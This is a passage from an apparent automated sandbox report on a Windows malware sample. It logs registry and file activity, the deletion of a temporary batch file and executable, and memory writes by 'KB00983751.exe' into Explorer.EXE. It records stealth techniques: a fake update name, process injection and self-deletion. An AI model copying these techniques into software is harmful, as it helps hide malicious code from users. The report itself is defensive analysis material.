Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Language Groups ],
Value Name: [ 1 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Locale ],
Value Name: [ 00000C07 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
Value Name: [ ProductType ], Value: [ WinNT ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 9 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Multimedia\Audio ],
Value Name: [ SystemFormats ], Value: [ CD Quality,Radio Quality,Telephone Quality ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time
[=============================================================================]
4.b) cmd.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Deleted:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\bc9deebcb0.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Device Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 1 time
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSACM32.dll ]
File Name: [ C:\WINDOWS\system32\SHELL32.dll ]
File Name: [ C:\WINDOWS\system32\ShimEng.dll ]
File Name: [ C:\WINDOWS\system32\UxTheme.dll ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
[#############################################################################]
5. Explorer.EXE
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: KB00983751.exe wrote to the virtual memory of this process
Filename: Explorer.EXE
MD5: 12896823fb95bfb3dc9b46bcaedc9923
SHA-1: 9d2bf84874abc5b6e9a2744b7865c193c08d362f
File Size: 1033728 Bytes
Command Line: C:\WINDOWS\Explorer.EXE
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\BROWSEUI.dll ],
Base Address: [0x75F80000 ], Size: [0x000FD000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\SHDOCVW.dll ],
Base Address: [0x7E290000 ], Size: [0x00171000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\CRYPTUI.dll ],
Base Address: [0x754D0000 ], Size: [0x00080000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\WINTRUST.dll ],
Base Address: [0x76C30000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\IMAGEHLP.dll ],
Base Address: [0x76C90000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
Base Address: [0x76F60000 ], Size: [0x0002C000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\System32\cscui.dll ],
Base Address: [0x77A20000 ], Size: [0x00054000 ]
Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
Base Address: [0x76600000 ], Size: [0x0001D000 ]
Module Name: [ C:\WINDOWS\system32\themeui.dll ],
Base Address: [0x5BA60000 ], Size: [0x00071000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00AC0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\actxprxy.dll ],
Base Address: [0x71D40000 ], Size: [0x0001B000 ]
Module Name: [ C:\WINDOWS\system32\msutb.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
Base Address: [0x7E1E0000 ], Size: [0x000A2000 ]
Module Name: [ C:\WINDOWS\system32\LINKINFO.dll ],
Base Address: [0x76980000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\ntshrui.dll ],
Base Address: [0x76990000 ], Size: [0x00025000 ]
Module Name: [ C:\WINDOWS\system32\ATL.DLL ],
Base Address: [0x76B20000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\rsaenh.dll ],
Base Address: [0x68000000 ], Size: [0x00036000 ]
Module Name: [ C:\WINDOWS\system32\msi.dll ],
Base Address: [0x7D1E0000 ], Size: [0x002BC000 ]
Module Name: [ C:\WINDOWS\system32\WINSTA.dll ],
Base Address: [0x76360000 ], Size: [0x00010000 ]
Module Name: [ C:\WINDOWS\system32\webcheck.dll ],
Base Address: [0x74B30000 ], Size: [0x00046000 ]
Module Name: [ C:\WINDOWS\system32\WSOCK32.dll ],
Base Address: [0x71AD0000 ], Size: [0x00009000 ]
Module Name: [ C:\WINDOWS\system32\WS2_32.dll ],
Base Address: [0x71AB0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ],
Base Address: [0x71AA0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\stobject.dll ],
Base Address: [0x76280000 ], Size: [0x00021000 ]
Module Name: [ C:\WINDOWS\system32\BatMeter.dll ],
Base Address: [0x74AF0000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\POWRPROF.dll ],
Base Address: [0x74AD0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SETUPAPI.dll ],
Base Address: [0x77920000 ], Size: [0x000F3000 ]
Module Name: [ C:\WINDOWS\system32\WTSAPI32.dll ],
Base Address: [0x76F50000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\NETSHELL.dll ],
Base Address: [0x76400000 ], Size: [0x001A5000 ]
Module Name: [ C:\WINDOWS\system32\credui.dll ],
Base Address: [0x76C00000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\dot3api.dll ],
Base Address: [0x478C0000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\dot3dlg.dll ],
Base Address: [0x736D0000 ], Size: [0x00006000 ]
Module Name: [ C:\WINDOWS\system32\OneX.DLL ],
Base Address: [0x5DCA0000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\eappcfg.dll ],
Base Address: [0x745B0000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\MSVCP60.dll ],
Base Address: [0x76080000 ], Size: [0x00065000 ]
Module Name: [ C:\WINDOWS\system32\eappprxy.dll ],
Base Address: [0x5DCD0000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\iphlpapi.dll ],
Base Address: [0x76D60000 ], Size: [0x00019000 ]
Module Name: [ C:\WINDOWS\system32\MPR.dll ],
Base Address: [0x71B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\System32\drprov.dll ],
Base Address: [0x75F60000 ], Size: [0x00007000 ]
Module Name: [ C:\WINDOWS\System32\ntlanman.dll ],
Base Address: [0x71C10000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\System32\NETUI0.dll ],
Base Address: [0x71CD0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\System32\NETUI1.dll ],
Base Address: [0x71C90000 ], Size: [0x00040000 ]
Module Name: [ C:\WINDOWS\System32\NETRAP.dll ],
Base Address: [0x71C80000 ], Size: [0x00007000 ]
Module Name: [ C:\WINDOWS\System32\SAMLIB.dll ],
Base Address: [0x71BF0000 ], Size: [0x00013000 ]
Module Name: [ C:\WINDOWS\System32\davclnt.dll ],
Base Address: [0x75F70000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\comdlg32.dll ],
Base Address: [0x763B0000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\MSGINA.dll ],
Base Address: [0x75970000 ], Size: [0x000F8000 ]
Module Name: [ C:\WINDOWS\system32\ODBC32.dll ],
Base Address: [0x74320000 ], Size: [0x0003D000 ]
Module Name: [ C:\WINDOWS\system32\odbcint.dll ],
Base Address: [0x01350000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\browselc.dll ],
Base Address: [0x71600000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\shdoclc.dll ],
Base Address: [0x71800000 ], Size: [0x00088000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\sensapi.dll ],
Base Address: [0x722B0000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\rasman.dll ],
Base Address: [0x76E90000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.dll ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\RASAPI32.DLL ],
Base Address: [0x76EE0000 ], Size: [0x0003C000 ]
[=============================================================================]
5.a) Explorer.EXE - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Keys Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\ ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], New Value: [ 0 ]
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Common AppData ], New Value: [ C:\Documents and Settings\All Users\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ GlobalUserOffline ], New Value: [ 0 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ MigrateProxy ], New Value: [ 1 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], New Value: [ 0 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ SavedLegacySettings ], New Value: [ 0x3c0000001700000001000000000000000000000000000000040000000000 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ ConsoleTracingMask ], Value: [ 4294901760 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ EnableFileTracing ], Value: [ 0 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ FileDirectory ], Value: [ %windir%\tracing ], 2 times
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ FileTracingMask ], Value: [ 4294901760 ], 1 time
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Value Name: [ MaxFileSize ], Value: [ 1048576 ], 1 time
Key: [ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ],
Value Name: [ UrlEncoding ], Value: [ 0x00000000 ], 2 times
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Next_Catalog_Entry_ID ], Value: [ 1020 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Num_Catalog_Entries ], Value: [ 13 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Value Name: [ Serial_Access_Num ], Value: [ 6 ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000001 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000002 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000003 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000004 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000005 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000006 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000007 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000008 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000009 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000010 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000011 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000012 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\Catalog_Entries\000000000013 ],
Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING ],
Value Name: [ Explorer.EXE ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ ConsoleTracingMask ], Value: [ 4294901760 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ EnableFileTracing ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ FileDirectory ], Value: [ %windir%\tracing ], 4 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ FileTracingMask ], Value: [ 4294901760 ], 2 times
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Value Name: [ MaxFileSize ], Value: [ 1048576 ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ AllUsersProfile ], Value: [ All Users ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ DefaultUserProfile ], Value: [ Default User ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ],
Value Name: [ ProfilesDirectory ], Value: [ %SystemDrive%\Documents and Settings ], 6 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-842925246-1425521274-308236825-500 ],
Value Name: [ ProfileImagePath ], Value: [ %SystemDrive%\Documents and Settings\Administrator ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
Value Name: [ CommonFilesDir ], Value: [ C:\Program Files\Common Files ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
Value Name: [ ProgramFilesDir ], Value: [ C:\Program Files ], 3 times
Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Common AppData ], Value: [ %ALLUSERSPROFILE%\Application Data ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 4 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ ComSpec ], Value: [ %SystemRoot%\system32\cmd.exe ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ FP_NO_HOST_CHECK ], Value: [ NO ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ NUMBER_OF_PROCESSORS ], Value: [ 1 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ OS ], Value: [ Windows_NT ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PATHEXT ], Value: [ .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_ARCHITECTURE ], Value: [ x86 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_IDENTIFIER ], Value: [ x86 Family 6 Model 3 Stepping 3, GenuineIntel ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_LEVEL ], Value: [ 6 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ PROCESSOR_REVISION ], Value: [ 0303 ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ Path ], Value: [ %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
